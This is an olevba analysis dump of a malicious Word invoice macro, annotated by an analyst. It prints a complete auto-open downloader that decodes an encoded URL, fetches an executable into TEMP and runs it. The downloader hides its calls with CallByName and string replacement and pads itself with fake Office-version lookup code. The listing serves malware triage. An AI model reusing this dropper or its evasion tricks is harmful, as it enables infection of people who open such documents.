dynamoo

Malicious Word macro

Jan 11th, 2016
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MAS--B-V invoic~1.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: invoic~1.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: invoic~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15. Sub autoopen() ' Auto-exec entry point: per the olevba summary, AutoOpen runs when the Word document is opened.
  16. GetEdition2000 "00" ' Not a real edition lookup: GetEdition2000 jumps over its Select Case and starts the download chain.
  17. End Sub
  18.  
  19.  
  20. -------------------------------------------------------------------------------
  21. VBA MACRO Module1.bas
  22. in file: invoic~1.doc - OLE stream: u'Macros/VBA/Module1'
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. Public SBTART As Object ' HTTP client; set to CreateObject("Microsoft" + ".XMLHTTP") in GetEdition2000
  25. Public PublisherTrial As Object ' Adodb.Stream that receives the HTTP response body (set in GetEdition2000)
  26. Public Ultimate2007  As Object ' WScript.Shell Environment("Process") collection (set in GetEdition2000)
  27. Public Personal2007 As String ' value read from the TEMP environment variable (set in GetEdition2002)
  28. Public OneNote2007 As String ' full path the downloaded file is written to (set in GetEdition2002)
  29. Public Plus2010 As Object ' Shell.Application, used in GetEdition2013 to open the saved file
  30. Public Sub Version_Test()
      ' Prints the detected Office edition to the Immediate window.
      ' Nothing in the visible code calls this Sub; autoopen goes straight to GetEdition2000.
  31.  On Error GoTo 0
  32.  Debug.Print GetEdition(Application.Version, Application.ProductCode)
  33. End Sub
  34. Public Function GetEdition(ByRef strAppVersion As String, ByRef strGuid As String) As String
      ' Dispatches on Val(strAppVersion) to a per-release lookup and returns its result.
      ' strGuid is sliced with Mid$ to obtain the SKU code handed to that lookup.
      ' Only Version_Test calls this function in the visible code, so it is not on the autoopen path.
      ' NOTE(review): the error text names "Class aegit_expClass"; presumably this routine was copied
      ' from an unrelated project to make the module look legitimate - confirm.
  35.  On Error GoTo PROC_ERR
  36.  Const strERR_MSG As String = "Unable to determine edition"
  37.  Dim strSku As String
  38.  Debug.Print "strAppVersion=" & strAppVersion
  39.  Debug.Print "Val(strAppVersion)=" & Val(strAppVersion)
  40.  Debug.Print "strGuid = " & strGuid
  41.  Select Case Val(strAppVersion)
  42.  Case Is < 9
  43.  GetEdition = "Pre Office 2000: " & strERR_MSG
  44.  Case Is < 10
  45.  strSku = Mid$(strGuid, 4, 2)
  46.  GetEdition = GetEdition2000(strSku) ' in this module GetEdition2000 ignores strSku and starts the download chain
  47.  Case Is < 11
  48.  strSku = Mid$(strGuid, 4, 2)
  49.  GetEdition = GetEdition2002(strSku) ' likewise: GetEdition2002 skips its lookup and runs the download stage
  50.  Case Is < 12
  51.  strSku = Mid$(strGuid, 4, 2)
  52.  GetEdition = GetEdition2003(strSku)
  53.  Case Is < 13
  54.  strSku = Mid$(strGuid, 11, 4)
  55.  GetEdition = GetEdition2007(strSku)
  56.  Case Is < 15
  57.  strSku = Mid$(strGuid, 11, 4)
  58.  GetEdition = GetEdition2010(strSku)
  59.  Case Is < 16
  60.  strSku = Mid$(strGuid, 11, 4)
  61.  Debug.Print "strSku=" & strSku
  62.  GetEdition = GetEdition2013(strSku) ' GetEdition2013 also skips its lookup and runs the save-and-open stage
  63.  Case Is < 17
  64.  strSku = Mid$(strGuid, 11, 4)
  65.  Debug.Print "strSku=" & strSku
  66.  GetEdition = GetEdition2016(strSku)
  67.  Case Else
  68.  GetEdition = "Post Office 2016: " & strERR_MSG
  69.  End Select
  70. PROC_EXIT:
  71.  Exit Function
  72. PROC_ERR:
  73.  MsgBox "Erl=" & Erl & " Error " & Err.Number & " (" & Err.Description & ") in procedure GetEdition of Class aegit_expClass"
  74.  GetEdition = strERR_MSG & vbNewLine & _
  75.  "Error Number: " & CStr(Err.Number) & _
  76.  vbNewLine & "Error Desc: " & Err.Description
  77. End Function
  78. Public Function on2(Madm As String, LenLen As Integer) As String
      ' String de-obfuscator used for the download URL.
      ' Madm:   integers joined by "--".
      ' LenLen: sizes the work array and is also part of the subtraction key.
      ' Returns the text obtained by subtracting (LenLen + 8500) from each integer and applying Chr.
  79.     Dim arr() As String
  80. Dim a As Variant
  81. arr = Split(Madm, "--") ' tokenise on the "--" delimiter
  82. Dim fromArr() As Integer
  83. ReDim fromArr(LenLen) ' upper bound LenLen; with the default lower bound of 0 that is LenLen + 1 slots
  84. For a = LBound(arr) To UBound(arr)
  85.     fromArr(a) = CInt(arr(a))
  86. Next a
  87.     Dim i As Integer
  88.     Dim result As String
  89.     result = ""
  90.     For i = LBound(fromArr) To UBound(fromArr)
  91.         result = result & Chr(fromArr(i) - LenLen - 8000 - 500) ' the only visible call passes 37, so the key is 8537
  92.     Next i
  93.     on2 = result
  94. End Function
  95. Public Function GetEdition2000(ByRef strSku As String) As String
      ' Stage 1 of the chain started by autoopen: creates the COM objects the later stages use,
      ' then calls GetEdition2002. Despite the name it returns no edition on this path: the
      ' GoTo Step1 below skips the whole Select Case, which is left in place as camouflage.
  96.  On Error GoTo 0
  97.  Set SBTART = CreateObject("Microsoft" + ".XMLHTTP") ' ProgID split in two so the literal "Microsoft.XMLHTTP" never appears
  98. Set PublisherTrial = CreateObject("Adodb.Stream") ' stream that will hold the downloaded bytes
  99. Set Plus2010 = CreateObject("Shell.Application") ' used in GetEdition2013 to open the saved file
  100. GoTo Step1 ' unconditional jump: lines 101-172 of the listing are never executed
  101.  Select Case strSku
  102.  Case "00"
  103.  GetEdition2000 = "Microsoft Office 2000 Premium Edition CD1"
  104.  Case "01"
  105.  GetEdition2000 = "Microsoft Office 2000 Professional Edition"
  106.  Case "02"
  107.  GetEdition2000 = "Microsoft Office 2000 Standard Edition"
  108.  Case "03"
  109.  GetEdition2000 = "Microsoft Office 2000 Small Business Edition"
  110.  Case "04"
  111.  GetEdition2000 = "Microsoft Office 2000 Premium CD2"
  112.  Case "05"
  113.  GetEdition2000 = "Office CD2 SMALL"
  114.  Case "06" To "09", "0A" To "0F"
  115.  GetEdition2000 = "(reserved)"
  116.  Case "10"
  117.  GetEdition2000 = "Microsoft Access 2000 (standalone)"
  118.  Case "11"
  119.  GetEdition2000 = "Microsoft Excel 2000 (standalone)"
  120.  Case "12"
  121.  GetEdition2000 = "Microsoft FrontPage 2000 (standalone)"
  122.  Case "13"
  123.  GetEdition2000 = "Microsoft PowerPoint 2000 (standalone)"
  124.  Case "14"
  125.  GetEdition2000 = "Microsoft Publisher 2000 (standalone)"
  126.  Case "15"
  127.  GetEdition2000 = "Office Server Extensions"
  128.  Case "16"
  129.  GetEdition2000 = "Microsoft Outlook 2000 (standalone)"
  130.  Case "17"
  131.  GetEdition2000 = "Microsoft Word 2000 (standalone)"
  132.  Case "18"
  133.  GetEdition2000 = "Microsoft Access 2000 runtime version"
  134.  Case "19"
  135.  GetEdition2000 = "FrontPage Server Extensions"
  136.  Case "1A"
  137.  GetEdition2000 = "Publisher Standalone OEM"
  138.  Case "1B"
  139.  GetEdition2000 = "DMMWeb"
  140.  Case "1C"
  141.  GetEdition2000 = "FP WECCOM"
  142.  Case "1D" To "1F"
  143.  GetEdition2000 = "(reserved standalone SKUs)"
  144.  Case "20" To "29", "2A" To "2F"
  145.  GetEdition2000 = "Office Language Packs"
  146.  Case "30" To "39", "3A" To "3F"
  147.  GetEdition2000 = "Proofing Tools Kit(s)"
  148.  Case "40"
  149.  GetEdition2000 = "Publisher Trial CD"
  150.  Case "41"
  151.  GetEdition2000 = "Publisher Trial Web"
  152.  Case "42"
  153.  GetEdition2000 = "SBB"
  154.  Case "43"
  155.  GetEdition2000 = "SBT"
  156.  Case "44"
  157.  GetEdition2000 = "SBT CD2"
  158.  Case "45"
  159.  GetEdition2000 = "SBTART"
  160.  Case "46"
  161.  GetEdition2000 = "Web Components"
  162.  Case "47"
  163.  GetEdition2000 = "VP Office CD2 with LVP"
  164.  Case "48"
  165.  GetEdition2000 = "VP PUB with LVP"
  166.  Case "49"
  167.  GetEdition2000 = "VP PUB with LVP OEM"
  168.  Case "4F"
  169.  GetEdition2000 = "Access 2000 SR-1 Run-Time Minimum"
  170.  Case Else
  171.  MsgBox "Error: GetEdition2000", vbCritical, "ERROR"
  172.  End Select
  173. Step1:
  174. Set Ultimate2007 = CreateObject("WScript.Shell").Environment("Process") ' process environment, read later for TEMP
  175. GetEdition2002 "" ' stage 2: GetEdition2002 jumps to its step100 label and performs the download
  176. End Function
  177. Private Function GetEdition2002(ByRef strSku As String) As String
       ' Stage 2 (download): decodes the URL, fetches it with the XMLHTTP object in SBTART and writes
       ' the response into the Adodb.Stream in PublisherTrial, then calls GetEdition2013.
       ' The Select Case below is never executed; GoTo step100 jumps over it.
  178.  strSkuOn = False ' not declared anywhere in the listing; passed below as the third argument of Open
  179.  GoTo step100 ' unconditional jump: lines 180-258 of the listing are dead code
  180.  On Error GoTo 0
  181.  Select Case strSku
  182.  Case "11"
  183.  GetEdition2002 = "Microsoft Office XP Professional"
  184.  Case "12"
  185.  GetEdition2002 = "Microsoft Office XP Standard"
  186.  Case "13"
  187.  GetEdition2002 = "Microsoft Office XP Small Business"
  188.  Case "14"
  189.  GetEdition2002 = "Microsoft Office XP Web Server"
  190.  Case "15"
  191.  GetEdition2002 = "Microsoft Access 2002"
  192.  Case "16"
  193.  GetEdition2002 = "Microsoft Excel 2002"
  194.  Case "17"
  195.  GetEdition2002 = "Microsoft FrontPage 2002"
  196.  Case "18"
  197.  GetEdition2002 = "Microsoft PowerPoint 2002"
  198.  Case "19"
  199.  GetEdition2002 = "Microsoft Publisher 2002"
  200.  Case "1A"
  201.  GetEdition2002 = "Microsoft Outlook 2002"
  202.  Case "1B"
  203.  GetEdition2002 = "Microsoft Word 2002"
  204.  Case "1C"
  205.  GetEdition2002 = "Microsoft Access 2002 Runtime"
  206.  Case "1D"
  207.  GetEdition2002 = "Microsoft FrontPage Server Extensions 2002"
  208.  Case "1E"
  209.  GetEdition2002 = "Microsoft Office Multilingual User Interface Pack"
  210.  Case "1F"
  211.  GetEdition2002 = "Microsoft Office Proofing Tools Kit"
  212.  Case "20"
  213.  GetEdition2002 = "System Files Update"
  214.  Case "22"
  215.  GetEdition2002 = "unused"
  216.  Case "23"
  217.  GetEdition2002 = "Microsoft Office Multilingual User Interface Pack Wizard"
  218.  Case "24"
  219.  GetEdition2002 = "Microsoft Office XP Resource Kit"
  220.  Case "25"
  221.  GetEdition2002 = "Microsoft Office XP Resource Kit Tools (download from Web)"
  222.  Case "26"
  223.  GetEdition2002 = "Microsoft Office Web Components"
  224.  Case "27"
  225.  GetEdition2002 = "Microsoft Project 2002"
  226.  Case "28"
  227.  GetEdition2002 = "Microsoft Office XP Professional with FrontPage"
  228.  Case "29"
  229.  GetEdition2002 = "Microsoft Office XP Professional Subscription"
  230.  Case "2A"
  231.  GetEdition2002 = "Microsoft Office XP Small Business Edition Subscription"
  232.  Case "2B"
  233.  GetEdition2002 = "Microsoft Publisher 2002 Deluxe Edition"
  234.  Case "2F"
  235.  GetEdition2002 = "Standalone IME (JPN Only)"
  236.  Case "30"
  237.  GetEdition2002 = "Microsoft Office XP Media Content"
  238.  Case "31"
  239.  GetEdition2002 = "Microsoft Project 2002 Web Client"
  240.  Case "32"
  241.  GetEdition2002 = "Microsoft Project 2002 Web Server"
  242.  Case "33"
  243.  GetEdition2002 = "Microsoft Office XP PIPC1 (Pre Installed PC) (JPN Only)"
  244.  Case "34"
  245.  GetEdition2002 = "Microsoft Office XP PIPC2 (Pre Installed PC) (JPN Only)"
  246.  Case "35"
  247.  GetEdition2002 = "Microsoft Office XP Media Content Deluxe"
  248.  Case "3A"
  249.  GetEdition2002 = "Project 2002 Standard"
  250.  Case "3B"
  251.  GetEdition2002 = "Project 2002 Professional"
  252.  Case "51"
  253.  GetEdition2002 = "Microsoft Office Visio Professional 2003"
  254.  Case "54"
  255.  GetEdition2002 = "Microsoft Office Visio Standard 2003"
  256.  Case Else
  257.  MsgBox "Error: GetEdition2002", vbCritical, "ERROR"
  258.  End Select
  259. step100:
       ' Every sensitive string from here on is built at run time (Replace/UCase/on2), so the literals
       ' "Open", "GET", "TEMP", "savetofile" and ".exe" do not appear in the macro source.
  260. Dim urlAr As String
       ' 38 integers joined by "--"; on2(urlAr, 37) subtracts 8537 from each and maps it through Chr.
       ' Decoded and defanged for analysis: hxxp://www[.]vmodal[.]mx/5fgbn/7tfr6kj.exe
  261.  urlAr = "8641--8653--8653--8649--8595--8584--8584--8656--8656--8656--8583--8655--8646--8648--8637--8634--8645--8583--8646--8657--8584--8590--8639--8640--8635--8647--8584--8592--8653--8639--8651--8591--8644--8643--8583--8638--8657--8638"
  262.  
       ' Resolves to SBTART.Open "GET", <decoded URL>, False: Replace("zpen","z","O") is "Open" and
       ' Replace(UCase("GoT"),"O","E") is "GET". CallByName hides the method name from static scans.
  263. CallByName SBTART, Replace("zpen", "z", "O"), VbMethod, Replace(UCase("GoT"), "O", "E"), on2(urlAr, 37), strSkuOn
  264.  
  265. Personal2007 = Ultimate2007(Replace("rEMP", "r", "T")) ' looks up "TEMP" in the process environment
  266. SBTART.Send ' sends the HTTP request
  267. OneNote2007 = Personal2007 + "\" + Replace("sbstart.txt", "t", "e") ' every "t" becomes "e": drop path is <TEMP>\sbseare.exe
  268.    PublisherTrial.Type = 1 ' 1 selects the binary stream type
  269.     PublisherTrial.Open
  270.     PublisherTrial.write SBTART.responseBody ' buffers the raw response bytes; nothing is on disk yet
  271.     GetEdition2013 "55" ' stage 3: GetEdition2013 jumps to its finita label, saves the stream and opens the file
  272. End Function
  273. Private Function GetEdition2003(ByRef strSku As String) As String
       ' Plain SKU-code to product-name lookup; it creates no objects and touches no network or file.
       ' In the visible code it is called only from GetEdition, which autoopen never invokes, so it
       ' looks like benign filler padding the module around the downloader.
  274.  On Error GoTo 0
  275.  Select Case strSku
  276.  Case "11"
  277.  GetEdition2003 = "Microsoft Office Professional Enterprise Edition 2003"
  278.  Case "12"
  279.  GetEdition2003 = "Microsoft Office Standard Edition 2003"
  280.  Case "13"
  281.  GetEdition2003 = "Microsoft Office Basic Edition 2003"
  282.  Case "14"
  283.  GetEdition2003 = "Microsoft Windows SharePoint Services 2.0"
  284.  Case "15"
  285.  GetEdition2003 = "Microsoft Office Access 2003"
  286.  Case "16"
  287.  GetEdition2003 = "Microsoft Office Excel 2003"
  288.  Case "17"
  289.  GetEdition2003 = "Microsoft Office FrontPage 2003"
  290.  Case "18"
  291.  GetEdition2003 = "Microsoft Office PowerPoint 2003"
  292.  Case "19"
  293.  GetEdition2003 = "Microsoft Office Publisher 2003"
  294.  Case "1A"
  295.  GetEdition2003 = "Microsoft Office Outlook Professional 2003"
  296.  Case "1B"
  297.  GetEdition2003 = "Microsoft Office Word 2003"
  298.  Case "1C"
  299.  GetEdition2003 = "Microsoft Office Access 2003 Runtime"
  300.  Case "1E"
  301.  GetEdition2003 = "Microsoft Office 2003 User Interface Pack"
  302.  Case "1F"
  303.  GetEdition2003 = "Microsoft Office 2003 Proofing Tools"
  304.  Case "23"
  305.  GetEdition2003 = "Microsoft Office 2003 Multilingual User Interface Pack"
  306.  Case "24"
  307.  GetEdition2003 = "Microsoft Office 2003 Resource Kit"
  308.  Case "26"
  309.  GetEdition2003 = "Microsoft Office XP Web Components"
  310.  Case "2E"
  311.  GetEdition2003 = "Microsoft Office 2003 Research Service SDK"
  312.  Case "44"
  313.  GetEdition2003 = "Microsoft Office InfoPath 2003"
  314.  Case "83"
  315.  GetEdition2003 = "Microsoft Office 2003 HTML Viewer"
  316.  Case "92"
  317.  GetEdition2003 = "Windows SharePoint Services 2.0 English Template Pack"
  318.  Case "93"
  319.  GetEdition2003 = "Microsoft Office 2003 English Web Parts and Components"
  320.  Case "A1"
  321.  GetEdition2003 = "Microsoft Office OneNote 2003"
  322.  Case "A4"
  323.  GetEdition2003 = "Microsoft Office 2003 Web Components"
  324.  Case "A5"
  325.  GetEdition2003 = "Microsoft SharePoint Migration Tool 2003"
  326.  Case "AA"
  327.  GetEdition2003 = "Microsoft Office PowerPoint 2003 Presentation Broadcast"
  328.  Case "AB"
  329.  GetEdition2003 = "Microsoft Office PowerPoint 2003 Template Pack 1"
  330.  Case "AC"
  331.  GetEdition2003 = "Microsoft Office PowerPoint 2003 Template Pack 2"
  332.  Case "AD"
  333.  GetEdition2003 = "Microsoft Office PowerPoint 2003 Template Pack 3"
  334.  Case "AE"
  335.  GetEdition2003 = "Microsoft Organization Chart 2.0"
  336.  Case "CA"
  337.  GetEdition2003 = "Microsoft Office Small Business Edition 2003"
  338.  Case "D0"
  339.  GetEdition2003 = "Microsoft Office Access 2003 Developer Extensions"
  340.  Case "DC"
  341.  GetEdition2003 = "Microsoft Office 2003 Smart Document SDK"
  342.  Case "E0"
  343.  GetEdition2003 = "Microsoft Office Outlook Standard 2003"
  344.  Case "E3"
  345.  GetEdition2003 = "Microsoft Office Professional Edition 2003 (with InfoPath 2003)"
  346.  Case "FD"
  347.  GetEdition2003 = "Microsoft Office Outlook 2003 (distributed by MSN)"
  348.  Case "FF"
  349.  GetEdition2003 = "Microsoft Office 2003 Edition Language Interface Pack"
  350.  Case "F8"
  351.  GetEdition2003 = "Remove Hidden Data Tool"
  352.  Case "3A"
  353.  GetEdition2003 = "Microsoft Office Project Standard 2003"
  354.  Case "3B"
  355.  GetEdition2003 = "Microsoft Office Project Professional 2003"
  356.  Case "32"
  357.  GetEdition2003 = "Microsoft Office Project Server 2003"
  358.  Case "51"
  359.  GetEdition2003 = "Microsoft Office Visio Professional 2003"
  360.  Case "52"
  361.  GetEdition2003 = "Microsoft Office Visio Viewer 2003"
  362.  Case "53"
  363.  GetEdition2003 = "Microsoft Office Visio Standard 2003"
  364.  Case "55"
  365.  GetEdition2003 = "Microsoft Office Visio for Enterprise Architects 2003"
  366.  Case "5E"
  367.  GetEdition2003 = "Microsoft Office Visio 2003 Multilingual User Interface Pack"
  368.  Case Else
  369.  MsgBox "Error: GetEdition2003", vbCritical, "ERROR"
  370.  End Select
  371. End Function
  372. Private Function GetEdition2007(ByRef strSku As String) As String
       ' Plain four-character SKU to product-name lookup; it creates no objects and touches no network or file.
       ' In the visible code it is called only from GetEdition, which autoopen never invokes, so it
       ' looks like benign filler padding the module around the downloader.
  373.  On Error GoTo 0
  374.  Select Case strSku
  375.  Case "0011"
  376.  GetEdition2007 = "Microsoft Office Professional Plus 2007"
  377.  Case "0012"
  378.  GetEdition2007 = "Microsoft Office Standard 2007"
  379.  Case "0013"
  380.  GetEdition2007 = "Microsoft Office Basic 2007"
  381.  Case "0014"
  382.  GetEdition2007 = "Microsoft Office Professional 2007"
  383.  Case "0015"
  384.  GetEdition2007 = "Microsoft Office Access 2007"
  385.  Case "0016"
  386.  GetEdition2007 = "Microsoft Office Excel 2007"
  387.  Case "0017"
  388.  GetEdition2007 = "Microsoft Office SharePoint Designer 2007"
  389.  Case "0018"
  390.  GetEdition2007 = "Microsoft Office PowerPoint 2007"
  391.  Case "0019"
  392.  GetEdition2007 = "Microsoft Office Publisher 2007"
  393.  Case "001A"
  394.  GetEdition2007 = "Microsoft Office Outlook 2007"
  395.  Case "001B"
  396.  GetEdition2007 = "Microsoft Office Word 2007"
  397.  Case "001C"
  398.  GetEdition2007 = "Microsoft Office Access Runtime 2007"
  399.  Case "0020"
  400.  GetEdition2007 = "Microsoft Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats"
  401.  Case "0026"
  402.  GetEdition2007 = "Microsoft Expression Web"
  403.  Case "0029"
  404.  GetEdition2007 = "Microsoft Office Excel 2007"
  405.  Case "002B"
  406.  GetEdition2007 = "Microsoft Office Word 2007"
  407.  Case "002E"
  408.  GetEdition2007 = "Microsoft Office Ultimate 2007"
  409.  Case "002F"
  410.  GetEdition2007 = "Microsoft Office Home and Student 2007"
  411.  Case "0030"
  412.  GetEdition2007 = "Microsoft Office Enterprise 2007"
  413.  Case "0031"
  414.  GetEdition2007 = "Microsoft Office Professional Hybrid 2007"
  415.  Case "0033"
  416.  GetEdition2007 = "Microsoft Office Personal 2007"
  417.  Case "0035"
  418.  GetEdition2007 = "Microsoft Office Professional Hybrid 2007"
  419.  Case "0037"
  420.  GetEdition2007 = "Microsoft Office PowerPoint 2007"
  421.  Case "003A"
  422.  GetEdition2007 = "Microsoft Office Project Standard 2007"
  423.  Case "003B"
  424.  GetEdition2007 = "Microsoft Office Project Professional 2007"
  425.  Case "0044"
  426.  GetEdition2007 = "Microsoft Office InfoPath 2007"
  427.  Case "0051"
  428.  GetEdition2007 = "Microsoft Office Visio Professional 2007"
  429.  Case "0052"
  430.  GetEdition2007 = "Microsoft Office Visio Viewer 2007"
  431.  Case "0053"
  432.  GetEdition2007 = "Microsoft Office Visio Standard 2007"
  433.  Case "00A1"
  434.  GetEdition2007 = "Microsoft Office OneNote 2007"
  435.  Case "00A3"
  436.  GetEdition2007 = "Microsoft Office OneNote Home Student 2007"
  437.  Case "00A7"
  438.  GetEdition2007 = "Calendar Printing Assistant for Microsoft Office Outlook 2007"
  439.  Case "00A9"
  440.  GetEdition2007 = "Microsoft Office InterConnect 2007"
  441.  Case "00AF"
  442.  GetEdition2007 = "Microsoft Office PowerPoint Viewer 2007 (English)"
  443.  Case "00B0"
  444.  GetEdition2007 = "The Microsoft Save as PDF add-in"
  445.  Case "00B1"
  446.  GetEdition2007 = "The Microsoft Save as XPS add-in"
  447.  Case "00B2"
  448.  GetEdition2007 = "The Microsoft Save as PDF or XPS add-in"
  449.  Case "00BA"
  450.  GetEdition2007 = "Microsoft Office Groove 2007"
  451.  Case "00CA"
  452.  GetEdition2007 = "Microsoft Office Small Business 2007"
  453.  Case "00E0"
  454.  GetEdition2007 = "Microsoft Office Outlook 2007"
  455.  Case "10D7"
  456.  GetEdition2007 = "Microsoft Office InfoPath Forms Services"
  457.  Case "110D"
  458.  GetEdition2007 = "Microsoft Office SharePoint Server 2007"
  459.  Case "1122"
  460.  GetEdition2007 = "Windows SharePoint Services Developer Resources 1.2"
  461.  Case "0010"
  462.  GetEdition2007 = "SKU - Microsoft Software Update for Web Folders (English) 12"
  463.  Case Else
  464.  MsgBox "Error: GetEdition2007", vbCritical, "ERROR"
  465.  End Select
  466. End Function
  467. Private Function GetEdition2010(ByRef strSku As String) As String
       ' Plain four-character SKU to product-name lookup; it creates no objects and touches no network or file.
       ' In the visible code it is called only from GetEdition, which autoopen never invokes, so it
       ' looks like benign filler padding the module around the downloader.
  468.  On Error GoTo 0
  469.  Select Case strSku
  470.  Case "0011"
  471.  GetEdition2010 = "Microsoft Office Professional Plus 2010"
  472.  Case "011D"
  473.  GetEdition2010 = "Microsoft Office Professional Plus Subscription 2010 "
  474.  Case "0012"
  475.  GetEdition2010 = "Microsoft Office Standard 2010"
  476.  Case "0013"
  477.  GetEdition2010 = "Microsoft Office Home and Business 2010"
  478.  Case "0014"
  479.  GetEdition2010 = "Microsoft Office Professional 2010"
  480.  Case "0015"
  481.  GetEdition2010 = "Microsoft Access 2010"
  482.  Case "0016"
  483.  GetEdition2010 = "Microsoft Excel 2010"
  484.  Case "0017"
  485.  GetEdition2010 = "Microsoft SharePoint Designer 2010"
  486.  Case "0018"
  487.  GetEdition2010 = "Microsoft PowerPoint 2010"
  488.  Case "0019"
  489.  GetEdition2010 = "Microsoft Publisher 2010"
  490.  Case "001A"
  491.  GetEdition2010 = "Microsoft Outlook 2010"
  492.  Case "001B"
  493.  GetEdition2010 = "Microsoft Word 2010"
  494.  Case "001C"
  495.  GetEdition2010 = "Microsoft Access Runtime 2010"
  496.  Case "001F"
  497.  GetEdition2010 = "Microsoft Office Proofing Tools Kit Compilation 2010"
  498.  Case "002F"
  499.  GetEdition2010 = "Microsoft Office Home and Student 2010"
  500.  Case "003A"
  501.  GetEdition2010 = "Microsoft Project Standard 2010"
  502.  Case "003B"
  503.  GetEdition2010 = "Microsoft Project Professional 2010"
  504.  Case "0044"
  505.  GetEdition2010 = "Microsoft InfoPath 2010"
  506.  Case "0052"
  507.  GetEdition2010 = "Microsoft Visio Viewer 2010"
  508.  Case "0057"
  509.  GetEdition2010 = "Microsoft Visio 2010"
  510.  Case "007A"
  511.  GetEdition2010 = "Microsoft Outlook Connector"
  512.  Case "008B"
  513.  GetEdition2010 = "Microsoft Office Small Business Basics 2010"
  514.  Case "00A1"
  515.  GetEdition2010 = "Microsoft OneNote 2010"
  516.  Case "00AF"
  517.  GetEdition2010 = "Microsoft PowerPoint Viewer 2010"
  518.  Case "00BA"
  519.  GetEdition2010 = "Microsoft Office SharePoint Workspace 2010"
  520.  Case "110D"
  521.  GetEdition2010 = "Microsoft Office SharePoint Server 2010"
  522.  Case "110F"
  523.  GetEdition2010 = "Microsoft Project Server 2010"
  524.  Case Else
  525.  MsgBox "Error: GetEdition2010", vbCritical, "ERROR"
  526.  Debug.Print "strSku = " & strSku
  527.  End Select
  528. End Function
  529. Private Function GetEdition2013(ByRef strSku As String) As String
       ' Stage 3 (drop and launch): writes the buffered download to the path in OneNote2007 and opens it.
       ' The Select Case is never executed; GoTo finita jumps over it and strSku is not read.
       ' For triage: the visible chain is Word issuing an HTTP GET, an .exe appearing under TEMP, and
       ' that file being opened through Shell.Application.
  530.  GoTo finita ' unconditional jump: lines 531-584 of the listing are dead code
  531.  On Error GoTo 0
  532.  Debug.Print "GetEdition2013 strSku=" & strSku
  533.  Select Case strSku
  534.  Case "0011"
  535.  GetEdition2013 = "Microsoft Office Professional Plus 2013"
  536.  Case "0012"
  537.  GetEdition2013 = "Microsoft Office Standard 2013"
  538.  Case "0013"
  539.  GetEdition2013 = "Microsoft Office Home and Business 2013"
  540.  Case "0014"
  541.  GetEdition2013 = "Microsoft Office Professional 2013"
  542.  Case "0015"
  543.  GetEdition2013 = "Microsoft Access 2013"
  544.  Case "0016"
  545.  GetEdition2013 = "Microsoft Excel 2013"
  546.  Case "0017"
  547.  GetEdition2013 = "Microsoft SharePoint Designer 2013"
  548.  Case "0018"
  549.  GetEdition2013 = "Microsoft PowerPoint 2013"
  550.  Case "0019"
  551.  GetEdition2013 = "Microsoft Publisher 2013"
  552.  Case "001A"
  553.  GetEdition2013 = "Microsoft Outlook 2013"
  554.  Case "001B"
  555.  GetEdition2013 = "Microsoft Word 2013"
  556.  Case "001C"
  557.  GetEdition2013 = "Microsoft Access Runtime 2013"
  558.  Case "001F"
  559.  GetEdition2013 = "Microsoft Office Proofing Tools Kit Compilation 2013"
  560.  Case "002F"
  561.  GetEdition2013 = "Microsoft Office Home and Student 2013"
  562.  Case "003A"
  563.  GetEdition2013 = "Microsoft Project Standard 2013"
  564.  Case "003B"
  565.  GetEdition2013 = "Microsoft Project Professional 2013"
  566.  Case "0044"
  567.  GetEdition2013 = "Microsoft InfoPath 2013"
  568.  Case "0051"
  569.  GetEdition2013 = "Microsoft Visio Professional 2013"
  570.  Case "0053"
  571.  GetEdition2013 = "Microsoft Visio Standard 2013"
  572.  Case "00A1"
  573.  GetEdition2013 = "Microsoft OneNote 2013"
  574.  Case "00BA"
  575.  GetEdition2013 = "Microsoft Office SharePoint Workspace 2013"
  576.  Case "110D"
  577.  GetEdition2013 = "Microsoft Office SharePoint Server 2013"
  578.  Case "110F"
  579.  GetEdition2013 = "Microsoft Project Server 2013"
  580.  Case "012B"
  581.  GetEdition2013 = "Microsoft Lync 2013"
  582.  Case Else
  583.  MsgBox "Error: GetEdition2013", vbCritical, "ERROR"
  584.  End Select
  585. finita:
       ' Replace("savRtofilR","R","e") is "savetofile": the stream is written to OneNote2007 with
       ' save option 2 (create or overwrite). CallByName keeps the method name out of the source text.
  586.     CallByName PublisherTrial, Replace("savRtofilR", "R", "e"), VbMethod, OneNote2007, 2
  587. Plus2010.Open (OneNote2007) ' Shell.Application opens the saved path; for the .exe written above that starts it
  588. End Function
  589. Private Function GetEdition2016(ByRef strSku As String) As String
       ' Plain four-character SKU to product-name lookup; it creates no objects and touches no network or file.
       ' In the visible code it is called only from GetEdition, which autoopen never invokes, so it
       ' looks like benign filler padding the module around the downloader.
  590.  On Error GoTo 0
  591.  Debug.Print "GetEdition2016 strSku=" & strSku
  592.  Select Case strSku
  593.  Case "0011"
  594.  GetEdition2016 = "Microsoft Office Professional Plus 2016"
  595.  Case "0012"
  596.  GetEdition2016 = "Microsoft Office Standard 2016"
  597.  Case "0015"
  598.  GetEdition2016 = "Microsoft Access 2016"
  599.  Case "0016"
  600.  GetEdition2016 = "Microsoft Excel 2016"
  601.  Case "0018"
  602.  GetEdition2016 = "Microsoft PowerPoint 2016"
  603.  Case "0019"
  604.  GetEdition2016 = "Microsoft Publisher 2016"
  605.  Case "001A"
  606.  GetEdition2016 = "Microsoft Outlook 2016"
  607.  Case "001B"
  608.  GetEdition2016 = "Microsoft Word 2016"
  609.  Case "001F"
  610.  GetEdition2016 = "Microsoft Office Proofing Tools Kit Compilation 2016"
  611.  Case "003A"
  612.  GetEdition2016 = "Microsoft Project Standard 2016"
  613.  Case "003B"
  614.  GetEdition2016 = "Microsoft Project Professional 2016"
  615.  Case "0051"
  616.  GetEdition2016 = "Microsoft Visio Professional 2016"
  617.  Case "0053"
  618.  GetEdition2016 = "Microsoft Visio Standard 2016"
  619.  Case "00A1"
  620.  GetEdition2016 = "Microsoft OneNote 2016"
  621.  Case "00BA"
